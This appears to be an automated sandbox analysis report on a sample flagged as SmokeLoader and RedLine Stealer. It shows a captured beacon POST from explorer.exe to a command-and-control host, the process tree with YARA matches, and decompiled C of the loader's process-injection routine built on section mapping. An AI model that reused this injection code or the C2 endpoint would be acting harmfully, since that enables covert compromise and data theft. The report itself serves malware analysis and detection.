                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          9192.168.2.749724185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:35.348030090 CET305OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qgjuekrsef.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 294
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:35.348050117 CET305OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9f 02 1f d3 26 f2 fe 75 ee 74 1f 5b
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ut[?%IQpPYo$7BRO>5X:JS,Zu.Y(j#(K^]Qk7GZ2aTNN>M\1_L\B+Tn$*&L?c?su
                          Nov 30, 2022 00:12:35.459623098 CET305INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:35 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:00:11:25
                          Start date:30/11/2022
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\file.exe
                          Imagebase:0x400000
                          File size:148992 bytes
                          MD5 hash:F39DBBCDCAAC9C8D2039B855C752C214
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          General

                          Target ID:1
                          Start time:00:11:32
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          General

                          Target ID:9
                          Start time:00:12:31
                          Start date:30/11/2022
                          Path:C:\Users\user\AppData\Roaming\jdggfai
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\jdggfai
                          Imagebase:0x400000
                          File size:148992 bytes
                          MD5 hash:F39DBBCDCAAC9C8D2039B855C752C214
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low

                          General

                          Target ID:10
                          Start time:00:12:40
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          General

                          Target ID:11
                          Start time:00:12:43
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:12
                          Start time:00:12:44
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:13
                          Start time:00:12:46
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:14
                          Start time:00:12:47
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high

                          General

                          Target ID:15
                          Start time:00:12:49
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                          General

                          Target ID:16
                          Start time:00:12:50
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                          General

                          Target ID:17
                          Start time:00:12:51
                          Start date:30/11/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\explorer.exe
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Target ID:20
                          Start time:00:12:52
                          Start date:30/11/2022
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0xd70000
                          File size:3611360 bytes
                          MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:46.2%
                            Total number of Nodes:52
                            Total number of Limit Nodes:1
                            execution_graph 4216 402f00 4217 402f2f 4216->4217 4218 4019b6 8 API calls 4217->4218 4219 402ff6 4217->4219 4218->4219 4224 4019c1 4225 4019c4 4224->4225 4226 401a03 Sleep 4225->4226 4227 401a1e 4226->4227 4228 4015d5 7 API calls 4227->4228 4229 401a2f 4227->4229 4228->4229 4182 40300f 4183 402fcc 4182->4183 4184 402ff6 4182->4184 4185 4019b6 8 API calls 4183->4185 4185->4184 4124 402f51 4126 402f55 4124->4126 4125 402ff6 4126->4125 4128 4019b6 4126->4128 4129 4019c7 4128->4129 4130 401a03 Sleep 4129->4130 4131 401a1e 4130->4131 4133 401a2f 4131->4133 4134 4015d5 4131->4134 4133->4125 4135 4015e3 4134->4135 4136 40179d 4135->4136 4137 401681 NtDuplicateObject 4135->4137 4136->4133 4137->4136 4138 40169e NtCreateSection 4137->4138 4139 4016c4 NtMapViewOfSection 4138->4139 4140 40171e NtCreateSection 4138->4140 4139->4140 4141 4016e7 NtMapViewOfSection 4139->4141 4140->4136 4142 40174a 4140->4142 4141->4140 4143 401705 4141->4143 4142->4136 4144 401754 NtMapViewOfSection 4142->4144 4143->4140 4144->4136 4145 40177b NtMapViewOfSection 4144->4145 4145->4136 4230 4015d4 4231 4015e3 4230->4231 4232 401681 NtDuplicateObject 4231->4232 4241 40179d 4231->4241 4233 40169e NtCreateSection 4232->4233 4232->4241 4234 4016c4 NtMapViewOfSection 4233->4234 4235 40171e NtCreateSection 4233->4235 4234->4235 4236 4016e7 NtMapViewOfSection 4234->4236 4237 40174a 4235->4237 4235->4241 4236->4235 4238 401705 4236->4238 4239 401754 NtMapViewOfSection 4237->4239 4237->4241 4238->4235 4240 40177b NtMapViewOfSection 4239->4240 4239->4241 4240->4241 4210 401a39 4211 4019ce 4210->4211 4213 401a2f 4210->4213 4212 401a03 Sleep 4211->4212 4214 401a1e 4212->4214 4214->4213 4215 4015d5 7 API calls 4214->4215 4215->4213

                            Executed Functions

                            Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 4015d5-4015de 1 4015e3-4015ef 0->1 2 4015ec 0->2 4 401603 1->4 5 4015f4-40162b call 401274 1->5 2->1 4->5 12 401630-401635 5->12 13 40162d 5->13 15 401956-40195e 12->15 16 40163b-40164c 12->16 13->12 15->12 19 401963-4019b3 call 401274 15->19 20 401652-40167b 16->20 21 401954 16->21 20->21 28 401681-401698 NtDuplicateObject 20->28 21->19 28->21 30 40169e-4016c2 NtCreateSection 28->30 32 4016c4-4016e5 NtMapViewOfSection 30->32 33 40171e-401744 NtCreateSection 30->33 32->33 36 4016e7-401703 NtMapViewOfSection 32->36 33->21 37 40174a-40174e 33->37 36->33 38 401705-40171b 36->38 37->21 39 401754-401775 NtMapViewOfSection 37->39 38->33 39->21 42 40177b-401797 NtMapViewOfSection 39->42 42->21 45 40179d call 4017a2 42->45
                            C-Code - Quality: 55%
                            			E004015D5(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __esi;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t122;
				PVOID* _t124;
				intOrPtr _t128;
				void** _t131;
				signed int _t138;
				int _t139;
				void* _t156;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t165;
				intOrPtr* _t166;
				void* _t169;
				intOrPtr _t178;
				void* _t179;
				void* _t180;
				void* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				intOrPtr* _t195;
				intOrPtr _t198;
				void* _t199;
				intOrPtr* _t200;
				void* _t203;
				long _t218;

				_push(0x392);
				_t200 = _t199 + 4;
				L00401274(0x161d, 0xf1, _t185, __eflags);
				_t128 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				_v96 = _t88;
				_t186 =  &_v100;
				 *_t186 = 0;
				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t186);
				_t91 =  *_t186;
				if(_t91 != 0) {
					_t131 =  &_v52;
					 *_t131 = _t91;
					_t131[1] = 0;
					_t186 =  &_v44;
					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push( &_v52);
					_push(_t186);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
						_v12 = 0;
						_t99 =  &_v84;
						 *((intOrPtr*)(_t99 + 4)) = 0;
						 *_t99 = 0x5000;
						_t187 =  &_v88;
						if(NtCreateSection(_t187, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t122 =  &_v72;
							 *_t122 = 0;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t122, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t124 =  &_v64;
								 *_t124 = 0;
								if(NtMapViewOfSection( *_t187, _v16, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t198 = _v72;
									 *((intOrPtr*)(_t128 + 0x20))(0, _t198, 0x104);
									 *((intOrPtr*)(_t198 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t101 =  &_v84;
						 *((intOrPtr*)(_t101 + 4)) = 0;
						 *_t101 = _a12 + 0x10000;
						_t186 =  &_v92;
						if(NtCreateSection(_t186, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t103 =  &_v76;
							 *_t103 = 0;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t105 =  &_v68;
								 *_t105 = 0;
								_t218 = NtMapViewOfSection( *_t186, _v16, _t105, 0, 0, 0,  &_v60, 1, 0, 0x20);
								if(_t218 == 0) {
									L24();
									if(_t218 == 0 && _t218 != 0) {
										asm("hlt");
										_push(_t200);
									}
									_push(0x2ea6);
									_t203 = _t200 + 4;
									_t160 = 0x2260;
									_t161 = _t160 << 5;
									_t162 = _t161 + 0x2260;
									asm("lodsb");
									_t163 = _t162;
									asm("loop 0xffffffc4");
									_t164 = _t163 ^ 0xad610a21;
									_t200 = _t203 - _t164;
									_t192 = _a8 +  *_a8;
									_t138 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t165 = _t192;
									if(_v56 == 0) {
										_t166 = _t165 + 0xf8;
										__eflags = _t166;
									} else {
										_t166 = _t165 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t166 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t166 + 0xc)) + _v76,  *((intOrPtr*)(_t166 + 0x14)) + _a8, _t139);
										_t200 = _t200 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t186);
									_t222 = _v56;
									if(_v56 == 0) {
										_push(_t186);
										_t169 = _t186[0xd] - _v68;
										_t195 = _t186[0x28] + _v76;
										__eflags = _t195;
										while(1) {
											__eflags =  *_t195;
											if( *_t195 == 0) {
												break;
											}
											_t178 =  *_t195;
											_t195 = _t195 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *0x00000000 =  *0x00000000 - _t169;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t178));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t186);
										__eflags = 0;
										_t109 =  &_v8;
										 *_t109 = 0;
										 *((intOrPtr*)(_t128 + 0x98))(_v16, 0, 0, 0, 0, 0, _t186[0xa] + _v68, _v64, _t109, 0);
									} else {
										L57();
										_pop(_t179);
										_t180 = _t179 - 0x1892;
										 *((intOrPtr*)(_t180 + 0x18c6)) = _t180 + 0x304c;
										L004012E3(_t128, _t222);
										0x33(_t180 + 0x304c, 0x1ad);
										 *((intOrPtr*)(_t180 + 0x18eb)) = _t180 + 0x309c;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161d);
				_t92 =  *_t200;
				_push(0x392);
				_t156 = 0xf1;
				return L00401274(_t92, _t156, _t186, _t222);
			}


























































                            0x004015f4
                            0x004015fc
                            0x00401618
                            0x0040161d
                            0x00401622
                            0x0040162b
                            0x0040162d
                            0x0040162d
                            0x00401630
                            0x00401630
                            0x00401635
                            0x00000000
                            0x00000000
                            0x0040195b
                            0x0040195b
                            0x0040163b
                            0x0040163e
                            0x00401641
                            0x00401645
                            0x00401648
                            0x0040164c
                            0x00401652
                            0x00401655
                            0x00401657
                            0x0040165a
                            0x00401660
                            0x00401663
                            0x00401671
                            0x00401672
                            0x00401673
                            0x00401675
                            0x0040167b
                            0x0040169e
                            0x004016a1
                            0x004016a4
                            0x004016a7
                            0x004016ad
                            0x004016c2
                            0x004016c4
                            0x004016c7
                            0x004016ca
                            0x004016cd
                            0x004016e5
                            0x004016e7
                            0x004016ea
                            0x00401703
                            0x00401705
                            0x0040170f
                            0x00401715
                            0x0040171b
                            0x0040171b
                            0x00401703
                            0x004016e5
                            0x0040171e
                            0x0040172a
                            0x0040172d
                            0x0040172f
                            0x00401744
                            0x00401754
                            0x00401757
                            0x0040175a
                            0x0040175d
                            0x00401775
                            0x0040177b
                            0x0040177e
                            0x00401795
                            0x00401797
                            0x0040179d
                            0x004017a2
                            0x004017a6
                            0x004017a7
                            0x004017a7
                            0x004017ce
                            0x004017d6
                            0x004017fd
                            0x00401809
                            0x00401813
                            0x00401822
                            0x0040182a
                            0x0040182f
                            0x00401838
                            0x00401841
                            0x0040184d
                            0x0040184f
                            0x00401853
                            0x00401854
                            0x0040185a
                            0x00401864
                            0x00401864
                            0x0040185c
                            0x0040185c
                            0x0040185c
                            0x0040186a
                            0x0040186b
                            0x00401870
                            0x0040187e
                            0x0040187e
                            0x0040187e
                            0x00401884
                            0x00401886
                            0x00401887
                            0x0040188b
                            0x004018f3
                            0x004018f7
                            0x00401902
                            0x00401902
                            0x00401905
                            0x00401905
                            0x00401908
                            0x00000000
                            0x00000000
                            0x0040190a
                            0x00401914
                            0x00401919
                            0x0040191b
                            0x00401920
                            0x0040192c
                            0x0040192c
                            0x0040192c
                            0x0040192e
                            0x0040192e
                            0x00401932
                            0x00401939
                            0x0040193b
                            0x0040193e
                            0x0040194e
                            0x0040188d
                            0x0040188d
                            0x00401892
                            0x00401893
                            0x004018a9
                            0x004018b8
                            0x004018c5
                            0x004018dc
                            0x004018ea
                            0x004018ea
                            0x0040188b
                            0x00401797
                            0x00401775
                            0x00401744
                            0x0040167b
                            0x0040196b
                            0x00401970
                            0x00401984
                            0x004019a2
                            0x004019b3

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                            • Instruction ID: f98827d68b3176c6101587f3b7b5f45d89ccd4612d0ba3f6c5a6805aca786af7
                            • Opcode Fuzzy Hash: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                            • Instruction Fuzzy Hash: 0B614CB4A00205BBEB209F95CC49FEF7BB8EF81B00F14012AF912BA1E5D6759945DB25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004015D4 Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 47 4015d4-4015ef 51 401603 47->51 52 4015f4-40162b call 401274 47->52 51->52 59 401630-401635 52->59 60 40162d 52->60 62 401956-40195e 59->62 63 40163b-40164c 59->63 60->59 62->59 66 401963-4019b3 call 401274 62->66 67 401652-40167b 63->67 68 401954 63->68 67->68 75 401681-401698 NtDuplicateObject 67->75 68->66 75->68 77 40169e-4016c2 NtCreateSection 75->77 79 4016c4-4016e5 NtMapViewOfSection 77->79 80 40171e-401744 NtCreateSection 77->80 79->80 83 4016e7-401703 NtMapViewOfSection 79->83 80->68 84 40174a-40174e 80->84 83->80 85 401705-40171b 83->85 84->68 86 401754-401775 NtMapViewOfSection 84->86 85->80 86->68 89 40177b-401797 NtMapViewOfSection 86->89 89->68 92 40179d call 4017a2 89->92
                            C-Code - Quality: 55%
                            			E004015D4(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v119;
				void* __ebx;
				void* __esi;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t94;
				struct _GUID _t101;
				struct _GUID _t103;
				PVOID* _t105;
				PVOID* _t107;
				intOrPtr* _t111;
				PVOID* _t124;
				PVOID* _t126;
				intOrPtr _t131;
				void** _t135;
				signed int _t142;
				int _t143;
				void* _t161;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				void* _t170;
				intOrPtr* _t171;
				void* _t174;
				intOrPtr _t185;
				void* _t186;
				void* _t187;
				void* _t192;
				HANDLE* _t193;
				HANDLE* _t195;
				void* _t200;
				intOrPtr* _t203;
				intOrPtr _t206;
				void* _t210;
				void* _t211;
				intOrPtr* _t212;
				void* _t216;
				intOrPtr _t217;
				long _t231;

				_t1 =  &_v119;
				 *_t1 = _v119 + __edx;
				_t217 =  *_t1;
				_t211 = _t210 - 0x60;
				_push(_t192);
				_push(0x392);
				_t212 = _t211 + 4;
				L00401274(0x161d, 0xf1, _t192, _t217);
				_t131 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t90 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				_v96 = _t90;
				_t193 =  &_v100;
				 *_t193 = 0;
				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t193);
				_t93 =  *_t193;
				if(_t93 != 0) {
					_t135 =  &_v52;
					 *_t135 = _t93;
					_t135[1] = 0;
